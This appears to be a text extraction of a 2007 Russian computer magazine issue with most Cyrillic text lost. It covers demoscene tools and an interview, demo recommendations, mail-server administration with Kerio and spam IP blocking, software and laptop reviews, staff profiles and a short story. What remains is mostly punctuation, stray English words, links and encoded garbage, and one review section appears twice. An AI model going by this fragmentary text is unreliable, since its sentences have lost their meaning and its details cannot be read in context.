(, , ) 100, 90%. , - .
: ,
, , .
: 100% .
, . ,
. , . , .
, , ,
. , .

{ IT }



-!
,
,
,
,
,
,
.

!
IT :
OPEN SOURCE
:
;

;
WEB-OFFICE: ?















ZZZ[DNHSUX


rr

 VXEVFULEH#JOFUX
  

 
 


 

 









 
  
          
 
,1)2#*/&58  :::;$.(358

, 




  



78 -TOPIC 02-07

>>



. 78

, ,

. 84




. 88

, .
, , .
- , , ,
. ,
.
, ,
, . ,
-. ,
( , 64 ,
), ,
, :)

demo-

,


,

.
? , ,
,

demo internal mechanics. , , .


.

, , .

20 . , kkapture
AVI
? !
. , ,

AVI' 25 , 100 200! ,
,
, .
?
, , ,
, ?. , .
C/C++ (VC, GNU C). , ,
, , C++
or die. , ,
, ,
MSDN, Direct-X SDK -

. just rumors. C/C++ . Delphi, VB , -


(, :-)).
. , . -
. , .
.
(, C++?). Werkkzeug.
( :)).

. ,
.
Farbrausch fr-025
( ).
, WZ
! WZ www.vova4age.narod.ru.

Moppy Demopaja. , WZ, Demopaja
,

80 -TOPIC 02-07

- (
). , neon v2
xplsv opensource- Plasticator.

, . : ,
, .
, , .
. .
- ,
. PNG JPG,
,
.
- 3Ds. -
( Deep Exploration).
, , . !
,

.
.
, ? www.sourceforge.net

. , dry wash only, 40 C, no bleach,
inside out, no machine washing OR just give it to
your wife its her job,
.
. ,
, ;).


. , . 64 Fr-08: The Produkkt ( ).
! ,
, (hi,
f0x!) Plasticator (http://plasticator.heroez.net). , , ,
,
. , how to. , , -

, ,

,
0

www.ainc.de
Texture
. , ,
, Plasticator,
.
.
? . (software)

OpenGL / DirectX (hardware accelerated).
, . (raytracing).


(scanlines),

, -

.

,

, - .
OpenGL DirectX.
OpenGL DirectX , , , DirectX
programmer-friendly.
, . DirectX, OpenGL
.

OpenGL , . . , . API OpenGL 2.0 , 2.

81

www.ainc.de Texture


SDL (Simple DirectMedia Layer, www.libsdl.org)
,
.


API SDL, OpenGL, ,
- ;).
C++
OpenGL/DirectX. ,
,

3D-. ,
, ,

, . .
,
,

;
,
;
API
. . new feature?
. , API
, ,
. , ,
, ,
.

.
, .
OpenGL- www.nehe.gamedev.net.
( (!) , )
, NeHe -. , -

NeHe .
NeHe
http://pmg.org.ru/nehe.
http://ultimategameprogramming.com OpenGL DirectX.
UGP , NeHe HDR,
Shadows-, , , ,
. DirectX
SDK,
, 8-
9- SDK .
. !
, ,
, , .

MIDI, , .
MIDI- MIDI. . ,
, . , ,
MIDI , ,
. :). .
,
() , .
. , () .
MOD:
8
4 .

the.popular.demo Farbrausch

{+} .

{-}

{+} , 10-
.

{-}

{+} ,

{-}

82 -TOPIC 02-07

{Werkkzeug}
www.theprodukkt.co
ll-in-one,

{Moppy Demopaja}
http://demopaja.org

,
plugin'

{Neon v2}
http://neonv2.com



,


{Plasticator}
http://plasticator.heroez.ne
,

,


. (
mp3-style ). : Haujobb disclone : T-Rex broadband.
: IT Impulse Tracker v2.14, XM
FastTracker 2. DOS' , win+linux IT Schism
tracker, XM Fast Tracker 3.
200-2000 .

( ) . - :
? . , .

()
. ,
, , .

,

( 21 ,
prerendering). , ,
: Farbrausch fr-34, AOS offworld ( , - CC-2006
, hi to Preston & UNC!).

, , ,
.
:
mp3, ogg, wma. .
. ,
:).
: mfx
deiteies, kewlers a significant deformation near
the cranium.

. , ,
.
Bass (, -
. ) Ian Luck
fMod Firelight multimedia. .
.
,
mp3 , . Bass mpeg MO3, fMod

Fr-08 : The Produkkt

. , MinifMod,
.
. demotools www.pouet.net public-, ,
.
? , generic-
.
,
,

NeHe.
.

. ,
progressbar? .
.
( ), . 64 , ,
.exe . , demo_fullscreen.exe demo_window.exe. - .
. ,
. OpenGL
pixelformat.

83


custom framerate. . 640x480@100, 640x480@default.
.
, single-file , .exe-
. .
.exe,
UPX ASPack.

ZIP, RAR. .
unique unRar library
(http://www.unrarlib.org).
,
. ,
temporary file,
, . , ,
-.
,
. ,
(
:) . ).
-, .
,
. ! , ? , , . .
.
fMod,
,
gettickcount
QueryPerfomanceTimer . Gettickcount
10 ,
100FPS, RTDS
iP3,
.
,

. , . , 13.5 ,
10- 15-. :
0
1, (13.5-10)/(1510)=0,7. . !
.
,

, ,

, ,


{1} c
matrix the fulcrum
90-. ,

166mhz .
, , ,

!

{2}
fan still sucking nature 2003,
!
,

.
{3}
rgba paradise,

! 56 !

, glow\bloom. ,
sc, .
.
, ,
,
D3D OpenGL . :). -.
onclusion .
,
, -

--. ,
, , . how does it work : ,
. . ,

, . ,
: DiHalt
ChaosConstructions

84 -TOPIC 02- 07


. C,
,
1993


Q: ! :
, ,
.
A: , .
Q: , , .
A: , IT
. ,
, . . 33 .
Q:
, ,
.
A: , 1993 1994 Realm Of Illusion
,
(diskmag) iNFUSED BYTES, -
intro, .
1995
demo party ENLIGHT'95 ().
Q:
.
?
A: demo party . intro demo, , .
Q:
?
A: . ,
. 8 Commodore 64, Amiga. PC
intro demo.
Q: ,
? ?
A: .
. ,
- -

/ . Fireworks Cross.
Q: , , ,
,
.
?
A: Commodore 64. - ( ,
,
).
C64 , , - ( ,
). Place in

85

Space Taboo, Red Storm by Triad, Wonderland,


Lights by Censor Design, Legoland by Fairlight.
Q: ,
? ,
- 90-
,
. , ?
A: . (, ), .
Q: ,


? -
? .

A: . , . - .
. . :
( iNFUSED BYTES) Bacchus/Fairlight.
GORE/Future Crew (
Future Crew,
Assembly Abyss
BBS). , PC.
Commodore 64
(
) ( GhostRider,

, 5.25" ). Commodore 64 160-300


, .
Q: ,
. ,

. ?
,
?
A: , , Realm Of Illusion PC.
C64 , Assembler ( 6510), .
,
http://www.enlight.ru/roi, -

86 -TOPIC 02- 07

PC .
,
.
, ,

Q:
?
..
A: . .
:). -
, .
Lord Ville (Aux), Jumbo
BigBug Wind Dragon.
Q: :
.
PC?
?
A: BASIC C64. , , .
, - ,
,
.
6510/6502 C64. PC
x86 Pascal. Forth.
, , .
Q: ! Asm InLine
. :
?
A: . , C64, . , (diskmags)
C64 . , , ,
( )
, .
Q: ,
?! , , ,
.
?
,
?
A: . .
: Commodore 64! Commodore Amiga! IBM PC.
, ,
(, , , ZX Spectrum). -
.
C64. -
(
,
, ) .
Commodore Amiga
( track-

mo ,
).
PC ( - ),
, . (
) ,
. .
Q: - ? ,
?
, ,
.
A: , . Amiga, Commodore 64 . C64
,
, ,
- .
.
Commodore 64, Amiga. , , , . , ,
- . C64.
Q: :
. ?
?
- ,
, ...
A: ,
Assembly 1992, 1993 .
PC, Amiga.
.
State of the Art Amiga, Second Reality
PC .
,
.

.
.
,
intro/demo , .
Q: 05-0
06?
,
? -
?
A: ,
. , , . . , ,
, , . , , (,
12334457
). . . .
, ,

, (
).
The Popular Demo, Paradise.
Q: /
?
A: RGBA, Farbrausch, Kewlers, Conspiracy, ASD,
Plastic, MFX.
Q: ? : ,
, ,
, .
A: Crolyx, Fox.
Q: ?
A: , .
. , ,
, Fox ( , ) .
, .
Q: , -
,
.
.
A: , :).
, .
Q: ', , .
-
,

, ,
-
: ,
.
A: ,
. , .
, , .
, - , , . , , DirectX.
. ,
.
Q: - ,
?
A: , :). Google .
,
: http://www.ojuice.net/ , http://www.pouet.net ,
http://www.scene.org, http://www.demoscene.ru , http://noscene.org.ru. .
Q: .
?
/ ?
A:
.
. , .

.
Q: . ,
.
A: !

$OOMDSDQHVH
WUHQGVLQVLGH

#01
2007

-
Blockbuster magazine

vfedha_[
ig[dZr
WjZjp[[
_Z[ihXehieaV

fgVXegjbsdr`
h[ah
buWeXs
^V`[dr

w{

-DSDQ

hi[g[ei_feX
evfedmVl

hVcr[_^epg[ddr[
_YgeXr[VXiecVir
_hi_dde[b_me
gVWeid_aeXhjo_WVgeX
Zege]dr[^dVa_ig[is[Yec_gV
30

u

88 -TOPIC 02-07

... ..
- ..
?! ? ,
? .

. , , GUS`A
( ),

. , 512B INTRO (
)
.
?
!
Lynx

, ,
. ,
35 ,
Freax (http://freax.hu).
,

. :
. ?
cracktro C64.
(
?) , ( )
.
, crack-
,

. , ,
.
,
.
.
. . -

GLITCH
by Kewlers
X-MIX 2004
by MFX Kewlers
TYPOGRAPHICS
by Kewlers

.
- , , , .
! , , .
. -, (, ).
, ,
,
, .
! exUSSR 10-. 2D-. , 90-,

,

89

, ,
, .
, ,
. ,
, , -

, .
, .
? , , ( ), . , , -
. ,
, .
? , . , : Future

Confused by Procreation, Spleen by Marshals, Chrome


by Damage.
2D-,
3D-, (fly by), . , ,
. :
1 Glitch by Kewlers (ftp://ftp.scene.org/pub/parties/2003/
stream03/demo/kwl_itch.zip);
2 X-Mix 2004 by MFX Kewlers (http://www.pouet.net/
prod.php?which=12028);
3 Typo Graphics by Kewlers (ftp://ftp.scene.org/pub/
parties/2004/scene_event04/demo/typo_graphics_by_kewlers.zip).
, ? , , !
?! , . , , - ,
.

90 -TOPIC 02-07

, - (
PC). , , .
2 5 6 .

-.
:
,
;
1

, .
-3D.
2

5 1 2 .
. , ,
,

3D-. 3D-
Z- 512 ,
, ,
.
4 . .
3D-, ,
,
, -
.

.
, 4 ,

23 OPENGL-

(, ,
).
,
SQUISH4K.
6 4 . !

.
?
,
64
,

,

!


2D- (
).
,
!

( ,

,
,
64 )

:
1 From Dusk til Dawn by Fairlight (ftp://ftp.scene.org/
pub/parties/2004/remedy04/demo/fairlight__from_dust_
till_dawn.zip);
2 Zoom3 by AND Cybermag (http://www.pouet.net/
prod.php?which=10454);
3 Candytron (FR30) by Farbrausch (http://www.pouet.net/prod.php?which=9424);
4 Welcome to by Farbrausch (http://www.pouet.net/prod.php?which=8696);
5 Binary Flow by Conspiracy (http://www.conspiracy.hu/dl.php3?prod=13);
6 Beyond by Conspiracy (http://conspiracy.intro.hu/
releases/cns!bydf.zip).
. , .
, , , , . , .
: . , , . , , .
. :
1
,
,
( -3D),

( 20 ),


( ),

-,

3D-
-

64 .
2 , ,
.

.

,

! , .

Kewlers MFX. -

FROM DUSK TIL DAWN


by Fairlight
ZOOM3
by AND Cybermag
CANDYTRON (FR30)
by Farbrausch
BINARY FLOW
by Conspiracy

91

92 -TOPIC 02-07

(
).
, , -
.
? .
1 Aether by MFX (ftp://ftp.scene.org/pub/parties/2005/
breakpoint05/demo/mfx_athr.zip)
2 Pornonoise
by MFX (http://www.pouet.net/prod.php?which=9467)
3 Deepness in the Sky by MFX (ftp://ftp.scene.org/
pub/parties/2002/sota02/demo/mfx_dis.zip)
4 Variform by Kewlers (ftp://ftp.scene.org/pub/parties/2002/assembly02/demo/variform_by_kewlers.zip)
5 Protozoa by Kewlers (ftp://ftp.scene.org/pub/parties/2003/breakpoint03/demo/kwl_prtz.zip)
6 A Significant Deformation Near The Cranium by
Kewlers (ftp://ftp.scene.org/pub/parties/2003/assembly03/demo/
a_significant_deformation_near_the_cranium_by_kewlers.zip)
7 X-Mix 2004 by MFX Kewlers (http://www.pouet.net/
prod.php?which=12028)
?! , 2D 3D? , 3D 2D-,
- Houjobb':
1 MicroStrange by Haujobb;
2 Elements by Haujobb;

3 We are by Haujobb (http://www.pouet.net/prod.


php?which=8281);
4 Strange Feelings by Haujobb.
, , , . , ,
, , . ? ? !
?
?

. Haujobb (>40), tAAt(>20),


ByteRapers(>30), TBL(>30), Razor 1911 ( ). 2D-, 23 3D-,
2D-, 3D, ! ! , .
.
! AND. :).

, /, . Scene is dead.

93



UNDERSPACE
(CROLYX TEAM)

DEEPNESS IN THE SKY


by MFX
AETHER
by MFX
PORNONOISE
by MFX
ELEMENTS
by HaujobbX
ELEMENTS
by HaujobbX
ELEMENTS
by HaujobbX

, .
,
, , ,
, .
,
. ,
. ? !
, , , , .


( ).
IT-
. -
,
, ,

. , ,
, 500 ,
, , , ,
? $600, 11fps. .
. ,
. GPU,
, -. , , !. ,

Xiod (, ).
.
,
Cr0ck' ( ). .
. . 512384. .
2001 ! ,
, . . , ,
: . , .
. ! , .
, ( ), .
{} !
{} .
{} -
?
{} ! !
{} .
{} #%@&**!
{} ( ).
{} !
{} ,
{} .
{} %@#%*!!
{} ( ): .
{} , $%@@ %&#!!
{}
... .
, , , . ;).

soft
admining
!


( S A N P R I H @ M A I L . R U )


, ,
.
,
,
. :
IP-
. ,
: /, ,
,
. ,
xakdomain.org, . DNS-
MX,
. , DNS-
,

. , ,
, .
, ,
.

.
:
,
!
,
, .
, .
. ,

Kerio.
. , 30
700
. ,
www.kerio.com. .
,
. (
). . ,
6.3 . . . .
.
, . .
. . , , . ,
.

.
.


.
,
. ,
.

,
,

.

, , .
- , ,
. .
Kerio,
,
.

. . .
.
. , , ,

. IMAP. : IMAP (Internet
Message Access Protocol) -
.
IMAP

, .
,
,

, .

()
.
,
IMAP. :
NNTP ,

news-
.
.
News-

, -

! IP-!
,
Spam&Virus.

. ! ,
( 61.216.119.248),
SPAM.
!
.

IP- IP-

IP- Spam&Virus. .

.

IP-
, ,

Span&Virus. , .
- ,
. , ,
, . : -,
,
www.whoisinform.ru,
IP-,
.
,
,
.

61.216.0.0 61.219.255.255.

. IP-

.
. SMTP 25 .,

LAN.
.
:
SMTP-,
- . - 30
.
,
-
. ,
, .
, -

, .

95 |

. NNTP -mail .
.

. ,
NNTP
- , ( ). NNTP TCP 119. NNTP SSL (.. NNTPS) 563.
.
NNTP
NNTP.
. LDAP.

Active Directory,
.
:

IP- . !
IP-! ,
Lan,
,
.

IP-, .
SMTP.
! SMTP.

IP-
IP-
LAN. ,
,
.
. . , IP-
LAN.
.
, , .
SMTP

.
,
. . !
.
. .
-

, ! .

,

. , .
, ,
. .




. , , .
, ,
,
,

.


.
!

! .
,
,


. , ,

,

.
,
.

soft

Console 2.00.127
sourceforge.net/projects/console
Freeware
-, ( Windows
) . .
, ,
cmd. ( ),
. sourceforge.net. Windows! , (cmd, bash, etc) . ( ), ( , , ), (
). portable software.

Audacity 1.2.6
audacity.sourceforge.net
Freeware
sourceforge.net
. Audacity ,
, (,
), (wav, mp3,
ogg): , , ,
. Audacity
( VST-),
,
. Audacity , Windows,
Mac OS X, GNU/Linux Unix.

1.3.2.

Advanced Vista
Codec Package 4.2.0
msfn.org
Freeware
Windows Vista , ,
, . , . ,
Windows XP, .
: . : ,
. .

NoClone Enterprise
Edition 4
noclone.net
Shareware
, , .
NoClone : (, CRC) ,
,
.
,
,



. , .

Windows Vista,

Microsoft. WinXP Manager . Vista Manager
, 20 ,
. , .

. ,
. Vista Manager Windows Vista .NET Framework, .

Portable AnyReader 1.9.55


anyreader.com/ru/
Shareware

Opera 9.10 Final


opera.com
Freeware

: CD/DVD-, Flash, HDD, ZIP, LAN, Wireless


LAN, Bluetooth. , , . AnyReader
,
. , . , ,
. , .

, , . Opera
.
,

, . Opera 9
. : p2p-, BitTorrent, , irc-,
rss-, ( , Windows Vista).
Fraud Protection.

Lazy Setup
CD 1.5 Pro
autosetup.org.ru
Shareware

,


?
, ,
. Lazy Setup CD , , Lazy Setup .
, Next
Yes, , , I Agree :). , //, , ..
. ,
75% .
, . .

97 |

Vista Manager 1.0.3


winxp-m
manager.com/vistamanager
Shareware

Easy CD-DA
Extractor 10.0.3
poikosoft.com
Shareware

-.
audioCD
(mp3, wma,
ogg, mp4, m4a, aac, FLAC, Musepack, vqf, wav, aiff Monkey's
Audio) ,
BURNProof. audioCD
,

. ID3, ID3V2-. ,
UNICODE, , . 30
, .

Mudbox 1.0 Final


mudbox3d.com
Shareware
,
3D- .
, , , . 3D-
. Mudbox
, . 3D-
Photoshop: , , .
.
.

hard


.
, . , , , .
.
PCMark 2005, ,
. ,
! ( , , ..) , .
, ,
.

. , , .
: .
Lavalys Everest . , . , S&M
( ) ThrottleWatch ( , ),
Always On ( ) Laptop (
). ,
, Laptop
,
, , . , : 3DMark 2001 SE, 3DMark 2003, 3DMark 2003,
PCMark 2004 PCMark 2005. Battery Eater,
. OptiCAL
.

ACER TRAVELMATE
4222 WLMI
($1100) 6

, : 1.66, Intel Core Duo T2300E


, : 1024
, : 15.4
, : Intel GMA 950
, : 80
: DVD+RW Super Multi
Fi
- : , LAN, Bluetooth, Wi-F
Card, VGA
: USB, mic, ear, PC-C
, : 364x274.75x30
, : 2.95

.
Acer, , ,
,
, ,
. 15.4" , ,
, , -

. web-. ,
. -
- . ,

(, LAN, Bluetooth,
Wi-Fi). -.
. , ,
,

.
- 3DMark 2005 2006,
, , .

($1199) 6

, : 1.8, AMD Sempron


, : 1024
, : 14
, : 256, NVIDIA GeForce Go 6100
, : 60
ROM
: DVD-R
- : , LAN
Card, VGA
: USB, mic, ear, PC-C
, : 330x275x26
, : 2.1

. , MSI ,
. ,
-

ROVERBOOK
NAUTILUS W550 WH
($1250) 9

60
, : 2.0, AMD Turion 64 X2 TL-6
, : 1024
, : 15.4
, : 5256, NVIDIA GeForce Go 7600
, : 100
: DVD+RW DL
Fi
- : , LAN, Bluetooth, Wi-F
Card,
: USB, mic, ear, PC-C
S-V
Video, DVI, mini FireWire
, : 35825930
, : 2.9

. Rover
675- MSI: ,
, NumPad'.
web-,
.
Rover : AMD Turion 64 X2 TL-60
( TL-56 675) (100
80 ). NVIDIA GeForce
7600 Go

MSI .
:
( ),
, ,

.
!
. , .
- ,
.

Power.

. , ,

. ,
, ,
Power,
. Wi-Fi
,
.
. ,
.
PCMark 2005
.
,
, ,

,
.

101 |

MSI MEGABOOK
S430

hard


.
, . , , , .
.
PCMark 2005, ,
. ,
! ( , , ..) , .
, ,
.

. , , .
: .
Lavalys Everest . , . , S&M
( ) ThrottleWatch ( , ),
Always On ( ) Laptop (
). ,
, Laptop
,
, , . , : 3DMark 2001 SE, 3DMark 2003, 3DMark 2003,
PCMark 2004 PCMark 2005. Battery Eater,
. OptiCAL
.

ACER TRAVELMATE
4222 WLMI
($1100) 6

, : 1.66, Intel Core Duo T2300E


, : 1024
, : 15.4
, : Intel GMA 950
, : 80
: DVD+RW Super Multi
Fi
- : , LAN, Bluetooth, Wi-F
Card, VGA
: USB, mic, ear, PC-C
, : 364x274.75x30
, : 2.95

.
Acer, , ,
,
, ,
. 15.4" , ,
, , -

. web-. ,
. -
- . ,

(, LAN, Bluetooth,
Wi-Fi). -.
. , ,
,

.
- 3DMark 2005 2006,
, , .

($1199) 6

, : 1.8, AMD Sempron


, : 1024
, : 14
, : 256, NVIDIA GeForce Go 6100
, : 60
ROM
: DVD-R
- : , LAN
Card, VGA
: USB, mic, ear, PC-C
, : 330x275x26
, : 2.1

. , MSI ,
. ,
-

ROVERBOOK
NAUTILUS W550 WH
($1250) 9

60
, : 2.0, AMD Turion 64 X2 TL-6
, : 1024
, : 15.4
, : 5256, NVIDIA GeForce Go 7600
, : 100
: DVD+RW DL
Fi
- : , LAN, Bluetooth, Wi-F
Card,
: USB, mic, ear, PC-C
S-V
Video, DVI, mini FireWire
, : 35825930
, : 2.9

. Rover
675- MSI: ,
, NumPad'.
web-,
.
Rover : AMD Turion 64 X2 TL-60
( TL-56 675) (100
80 ). NVIDIA GeForce
7600 Go

MSI .
:
( ),
, ,

.
!
. , .
- ,
.

Power.

. , ,

. ,
, ,
Power,
. Wi-Fi
,
.
. ,
.
PCMark 2005
.
,
, ,

,
.

101 |

MSI MEGABOOK
S430

crew


!

.
.

,
.
:), ,

.
-
IT ,
IT-
,

:).

(,
,
),
, ,
B2B
,
,
.
.

,

.

7
1

1

aka Dr.Klouniz




( )


' :).

2001 , , (


:)).
,
,
xakep.ru
,

Delphi :).

,
-



( ,
2003-, ,
,
).

(

,
:)),

(forums.rusmedserv.com). , , , ,
, power metal.


2006 ,

,
.

,

,
, -


:-)
( :) . Dr.).

, ;
,
. : (
! .
Dr.), .


,
!


!
, ,

, , .
,
!


=).
2006,

.
,

,
. ,
:
!


2003
,


,

,
.

- , -

103 |



.
, , .
.
. ,
Force Team
(www.forceteam.ru).

8
&

-

6

aka AvaLANche

2003 .
, ,



.

,
: ,
,

, ,


,
(,
?
,
:) . ).


, ,
. , ,

.


,
,


. ,

-.
,
,
, ( )
!

,
. 15
15
,
. , ,
. -

, - . , .

,
.
,

,
, ...



,
!

story


.
N I R O ( N I R O @ R E A L . X A K E P . R U ,
W W W . N I R O - D E - R O B E R T . L I V E J O U R N A L . C O M )


, ,
.
, ,

.
, , .
?
( )
:
. . , -.

, , . .


, -, , , .
,
! . !
! !
, -
:
. ?
. -
:

, ! .
, , , . ?
, -, .
.
?

, .
,
? , , .
, . .

, ,
. ?
.
.
.
- ?
. .
.
, ,
, .
. !
. . , .
,
:
?
:

,
. .
? .
. .
, ,
.
*****
.
, , - , , , ,
, - , , , , .
, , , . ? , ? ,
, , , ?
, ,
:
. .
. ,
. , . ICQ 444115686. -

105 |
, . . .
. ,
- ,
.
-, .
? , ? ? : , , .
, . ,
. .
, -
.
,
, .
. ,
, , .
, -

. ,
-
, ,
. ,
. ,
,
.
. , , ,
- .
, , , ,
,
. .
.
, . . . . , , . .
, , , . , ,
, . -

106 |

. , , , , .
- . , , , . . . , , .
; . , , .


-.

, , ,
, , , .
, .
. ,
, . , , , , .
. ,
, ,
, ,
, , . ,
, , .
, . ,
,
. ,
.
? , ,
.
-
, ,
, , . ,
, ,
, , , .
?.. , .
,
, , , ,
. , .
, .
. ?
.
, . - ,
*****
, ,
:
. . . , . ICQ 444115686 .
.
, , .
, , , , ,

, .
, , , - , -

. ,
, ,
,
. . .
-
. , , ,
, . - ,
, , -
. ,
, ,
.
, ,
. , - .
, , , ,
- ,
.
, , . , ,
.
, .
. ,
( ). , :
. , ,
. .
. .

. , ,
. , , ,
.
,
, , , , . , -
, , , , , ,
.
. .
. , , . , , . ,
, ,
.
.
? ,
. -
, ,
, . . - .
, . - , , . ,
,
, , . , .
, , ,
, .

*****
.
, , ,
, .
, , , ,
, , , ,
. -
,
. ,
, .
, , . , ,
. , - ,
, , , - .
- ,
. - ,
, , , .
,
, ,
. , . - .
? .
, :
, -?
, , ,
, . ? ,
.
:
. .
. , -

.




!

,
. , . .

, :
.
, ?

. - c.
?
. .
.
, . . ?
- ?
, ,
. -
, , . ,
,
- .
. . . . , . .
? .
?
:
. . . , , - .
. , .
,
. , ,
. , ,
, , .
, , , ,
?
? .
. .
. , ,
. , ,
, . , - ? ? -? ?
, -, . , . - , , , ?
? .
? , . ,
, . , . , ?
. ,

, ? .

, -
, , .
. .
, . -
, , .
.
. - . .

, , ,
?

107 |

: - . , ,
.
,
, . ,
.
,
,
.
, , , ; .
;
, . . .
,
. ; , . , , , , .
. ,
. , , .
, , .

,
.

108 |

, .
, .

. . .
, -.

*****
? , . , ,
?
?
, , - . . , - .
, ?
. . .
,
.
, ,
, -, - ,
, .
, ,
:
, -? ,
.
:
?
:
.
? , , . ? , ?
, . ,
, .
, -
, ,
. ,
. , , .
, .
, . - .
, , , . ,
.
. . , , , ,
.
.
. . .

, . , .
. ,
,
,
.
, -
.
,
, ,

, . , . .
, ,
- ,

*****
,
. ,
. -, ,
. , .
,
, ,
.
, , , , , . - ,
, .
- , , , .
,
, - ,
,
, . , ,
.
, , ,
, . - , , .
, ,
, , . ,
,
? ! ? ! , ? ? ? ? ? ! ? .
? . -? . ,

. .
, , , , , ,
. ,
.
.
, , , , ,
, .
- , . , , . , , - , - ,
, ? , - ,

, . ,
, ; ,
, , ,
.

, , -

. . . , . . .
. ,

, , .
, ,
, ,
.
, , ,

, , , , ?
? ,
!
. , , . , ,
, ,

, . , .
. . . .

. , , , .
, ,
, .
. .

, , .

, .
, , , ,
.
, . , ?..
*****
? , , . , -
, .
, !..
. , . ,
, .
.
,
. .

109 |

,
, .
, , , , , ,
. , ,

, , .
.
- , ,
. . - , , , , , .
.
- ,

.

, , , .
, ,
,
,
.
, - .
, .
, , ,
, .
.
, . .
, , ,
.
, , , -
- , ,
.
, - , . . - . , , . , , , . -
, , . :
, , . . , , . , ,
. .
, , -, . ;
:
, . .
.
.
-? , , .
.
, , . . -

? .

, . -

, , .
.
? - ?

110 |

, , .
? ? ?
! . 444115686, - , .

, .
. , ? ? ?
, :
.
:
.
. . .
.
. .
?..
? -, , . , !
, , . ,
.
.
. . , , .
. ,
. ,
, . ? ?
, .
, , .

- ?
. , . . . ?
, - , .
-
. .
, , ,
:
- ?
, :
, - ?
, ,
. - ,

.
, :
, . .
. , , ,
.

, .
, , ;
, . ,
, .
, .

. ,
. , ,
, .

, , .
, -
.
, , , ,
. .
.
,
:
! , ! !
:
. ,
?
.
, ?
:
, , . , , ?
. , .

, , .
. ,
, . ?
, .
? ? .
-, . .
. . , .
, ,
.
- , , .
. , .
. , . ,
.
, .
? ,
, , .
. ,

. , ,

.
.
- , , , , .
. .
.
,
,
. ,
, .

, , . .
?
, , - . . - ,
. - . , ,
. , .

*****
. , .
- ,
.

, -, . , ,
. .
, ,
. .
,
, .

. ,
,
.
, . ,
, . .
,
. ,
,
.

, . , .
?
, .
, , .

. , , . ,
,
. , ,
, , .
?
,
.
. .
, . .
.

,
.

.
.
?
, .
. ,

? ? .
.
?
, .
, .
, .
. .
. .

111 |

.
.
.
.
, , - .
, . ,
. , -
, .
? .
? . ,
,
? .
?
? .
, .
. ? ! ?
. , , ...
:
, ?
. , ,
, .
. .
?
.
, ,
.
, , . , ,
:
-
.
.

IV

112 |

,
4- . ,
.
, , ,
. ,
, (


),
.
.
( ).
3 , 39%
,
,
. , ! , ! - . , ,
,
. . ,
. ,
,
.
,
. . ,
, ,

: . ,
.
!!!
, , .
, (
), ,
.
,
, : ,
. . . ,
,
,
. ,

, ' ,
,
, ,
,
. , , , . ,

, ,
- .
,
. : , . . .
. .
, , - ,
. ,
.
:
.
,

, ,

.
(
!)
penumr', EPOX'. !
!

- P-III!
,
,
. ,
, 700VA . 2200VA.
. , , ,
,
:

. , SMS'
SMS',
. , .
- !
(
,
). ,
- ,
,
700VA,
2200VA,
. . . .
, .
SYS',
.
. , .
. XviD' ,

. ,

',

, ?
TOTAL DVD!
,
,

DVD , 50 ,

... !
, !

Total DVD !
DVD-
(
),
DVD-.

?
DVD - !
Hi-Fi, High End Home Cinema!



. 50

, ,
!

DVD !
, , , !
DVD-
(
) .

*3,.3*
XYFWY

R

F]NYZSN






SL



02|775|2007